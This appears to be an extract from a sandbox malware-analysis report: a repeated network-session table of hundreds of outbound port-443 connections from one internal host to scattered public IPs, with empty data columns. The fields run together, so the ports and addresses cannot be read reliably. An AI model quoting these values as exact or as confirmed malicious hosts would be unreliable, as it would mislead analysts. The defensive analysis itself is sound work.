                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12332192.168.2.1444158209.178.34.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12333192.168.2.143746254.84.142.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12334192.168.2.1436106151.244.17.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12335192.168.2.145049637.129.115.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12336192.168.2.1451632202.69.158.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12337192.168.2.1436416144.29.84.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12338192.168.2.1460476144.177.109.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12339192.168.2.144191252.151.56.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12340192.168.2.1444592112.189.214.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12341192.168.2.1436176107.188.2.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12342192.168.2.1442406189.58.75.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12343192.168.2.145022443.184.39.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12344192.168.2.145383487.212.139.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12345192.168.2.1448930190.169.141.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12346192.168.2.144861883.198.251.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12347192.168.2.145913284.126.216.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12348192.168.2.144104686.151.73.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12349192.168.2.1442676208.54.26.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12350192.168.2.1435476154.91.16.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12351192.168.2.1446234147.64.3.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12352192.168.2.144813280.119.70.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12353192.168.2.1455650168.243.200.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12354192.168.2.1447214118.226.241.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12355192.168.2.1460656183.23.63.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12356192.168.2.1443488185.90.234.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12357192.168.2.145072894.126.84.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12358192.168.2.1436058167.60.225.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12359192.168.2.1446862114.100.51.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12360192.168.2.1455412155.112.239.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12361192.168.2.1457534108.233.7.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12362192.168.2.144103646.84.247.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12363192.168.2.1458774102.231.223.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12364192.168.2.1456786188.121.67.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12365192.168.2.1443812189.59.126.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12366192.168.2.1446574169.133.28.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12367192.168.2.1447884219.157.18.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12368192.168.2.145057448.134.219.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12369192.168.2.144061464.102.239.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12370192.168.2.145150691.206.89.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12371192.168.2.145618424.29.172.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12372192.168.2.144882817.31.71.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12373192.168.2.1434344211.147.209.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12374192.168.2.1439238188.208.33.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12375192.168.2.1459754223.147.77.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12376192.168.2.143477263.85.79.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12377192.168.2.1446046210.181.98.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12378192.168.2.143722079.218.4.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12379192.168.2.143586691.253.73.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12380192.168.2.144566267.95.8.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12381192.168.2.1451076138.59.243.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12382192.168.2.1439332203.150.23.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12383192.168.2.1450320110.79.80.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12384192.168.2.14449325.75.89.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12385192.168.2.1441416145.250.41.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12386192.168.2.144729081.181.103.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12387192.168.2.1439712130.209.135.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12388192.168.2.143526249.95.136.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12389192.168.2.14525101.150.183.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12390192.168.2.1442200134.252.229.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12391192.168.2.1450846213.84.220.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12392192.168.2.1460080136.108.247.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12393192.168.2.143404875.186.231.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12394192.168.2.145375482.114.226.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12395192.168.2.1450050110.173.27.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12396192.168.2.1453516118.218.111.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12397192.168.2.1455626116.150.84.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12398192.168.2.1457952213.163.13.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12399192.168.2.143751841.49.120.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12400192.168.2.144359240.171.99.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12401192.168.2.1450930176.207.90.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12402192.168.2.1456092192.8.159.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12403192.168.2.1432898174.54.74.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12404192.168.2.145071853.12.3.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12405192.168.2.1459878131.184.68.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12406192.168.2.144556645.59.191.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12407192.168.2.145475219.241.19.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12408192.168.2.1438066170.99.94.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12409192.168.2.1459550123.126.103.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12410192.168.2.1460726182.111.100.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12411192.168.2.1441190216.166.162.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12412192.168.2.1439998153.228.84.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12413192.168.2.1452726208.211.220.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12414192.168.2.143810659.35.1.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12415192.168.2.1435682135.62.62.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12416192.168.2.1435184119.140.119.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12417192.168.2.1449118102.135.77.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12418192.168.2.143914287.199.58.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12419192.168.2.1455338123.251.18.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12420192.168.2.1453064146.244.162.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12421192.168.2.1433064113.87.239.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12422192.168.2.144036687.52.197.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12423192.168.2.145066481.105.238.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12424192.168.2.1437184147.123.135.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12425192.168.2.1450710157.85.208.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12426192.168.2.1444996150.172.34.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12427192.168.2.1458794151.233.247.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12428192.168.2.14446749.217.7.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12429192.168.2.1441394109.248.158.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12430192.168.2.1436396180.90.205.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12431192.168.2.1457984131.235.25.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12432192.168.2.145455266.131.93.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12433192.168.2.1436236179.57.14.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12434192.168.2.1446286143.180.10.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12435192.168.2.1447954199.28.160.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12436192.168.2.1433814168.123.11.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12437192.168.2.1439030166.69.54.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12438192.168.2.1460438201.28.106.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12439192.168.2.1458908190.199.30.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12440192.168.2.1435752163.160.106.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12441192.168.2.1447882206.76.228.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12442192.168.2.1447258192.72.45.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12443192.168.2.1441104209.184.46.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12444192.168.2.1438902130.3.140.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12445192.168.2.146073898.161.108.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12446192.168.2.145958284.183.208.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12447192.168.2.1433614117.131.14.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12448192.168.2.1458188131.133.162.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12449192.168.2.1446312149.15.22.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12450192.168.2.1438996150.94.240.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12451192.168.2.1454556119.206.51.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12452192.168.2.1458856124.177.57.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12453192.168.2.1444044186.133.176.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12454192.168.2.1450450121.140.4.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12455192.168.2.1447034157.124.103.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12456192.168.2.143314086.180.59.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12457192.168.2.1438122111.8.215.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12458192.168.2.1458652197.57.67.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12459192.168.2.1438876163.79.207.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12460192.168.2.144173814.198.223.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12461192.168.2.1446156108.64.109.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12462192.168.2.1451854205.103.149.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12463192.168.2.1449362164.40.30.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12464192.168.2.144579825.37.208.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12465192.168.2.143288247.130.176.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12466192.168.2.1438460198.128.197.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12467192.168.2.1444598139.163.40.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12468192.168.2.145840095.40.137.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12469192.168.2.144646845.246.22.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12470192.168.2.14480261.160.168.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12471192.168.2.1455162194.102.28.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12472192.168.2.1452572198.166.54.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12473192.168.2.1433076105.31.79.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12474192.168.2.145698279.36.212.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12475192.168.2.1444440201.47.240.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12476192.168.2.1444482175.68.50.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12477192.168.2.1459794183.198.190.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12478192.168.2.1432810152.188.68.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12479192.168.2.14348924.7.10.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12480192.168.2.144487278.33.93.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12481192.168.2.1445056191.2.236.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12482192.168.2.1435808154.250.54.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12483192.168.2.1451324190.252.231.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12484192.168.2.14500464.182.225.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12485192.168.2.1459164163.182.82.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12486192.168.2.1455950183.237.94.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12487192.168.2.1443358208.220.132.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12488192.168.2.143971498.157.67.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12489192.168.2.146098459.139.42.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12490192.168.2.143593275.94.115.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12491192.168.2.143752470.99.24.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12492192.168.2.143833068.112.187.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12493192.168.2.1453698171.175.105.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12494192.168.2.1460784183.232.138.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12495192.168.2.145623627.209.115.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12496192.168.2.1451412155.146.179.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12497192.168.2.144933074.47.69.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12498192.168.2.1453680189.99.82.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12499192.168.2.1454136176.228.29.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12500192.168.2.144581490.145.253.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12501192.168.2.1453236210.128.19.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12502192.168.2.1438166102.233.84.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12503192.168.2.1451940186.227.178.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12504192.168.2.145991678.82.32.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12505192.168.2.144731075.69.157.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12506192.168.2.1449334181.44.160.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12507192.168.2.1454134164.93.36.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12508192.168.2.144697484.232.71.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12509192.168.2.1453090213.87.176.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12510192.168.2.145258027.154.215.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12511192.168.2.14367649.72.54.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12512192.168.2.145762627.75.152.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12513192.168.2.1443994174.249.104.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12514192.168.2.143341438.219.86.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12515192.168.2.1444618154.240.95.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12516192.168.2.144044870.104.240.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12517192.168.2.143533454.31.64.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12518192.168.2.14495001.51.41.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12519192.168.2.146014439.130.213.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12520192.168.2.144068619.236.108.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12521192.168.2.144925874.148.206.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12522192.168.2.1437294196.71.58.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12523192.168.2.1453990154.45.251.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12524192.168.2.14353729.236.239.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12525192.168.2.144011673.103.16.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12526192.168.2.143594868.73.65.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12527192.168.2.1433174219.59.24.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12528192.168.2.145515063.50.208.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12529192.168.2.1454542188.220.235.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12530192.168.2.14463864.69.127.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12531192.168.2.1454990220.141.203.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12532192.168.2.1434052202.37.246.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12533192.168.2.1436714208.118.207.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12534192.168.2.144517480.181.77.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12535192.168.2.144852092.147.74.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12536192.168.2.1433092178.226.69.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12537192.168.2.144567071.168.129.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12538192.168.2.1435016163.190.102.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12539192.168.2.143661493.24.32.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12540192.168.2.1436238160.44.134.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12541192.168.2.1434464115.228.99.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12542192.168.2.143732859.131.11.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12543192.168.2.1452192184.197.96.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12544192.168.2.1450152112.154.11.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12545192.168.2.144079891.133.11.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12546192.168.2.145619097.223.250.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12547192.168.2.1452720213.39.208.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12548192.168.2.1460450208.196.114.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12549192.168.2.1450326100.248.211.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12550192.168.2.144085469.125.131.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12551192.168.2.1444600115.162.117.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12552192.168.2.1450846142.171.220.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
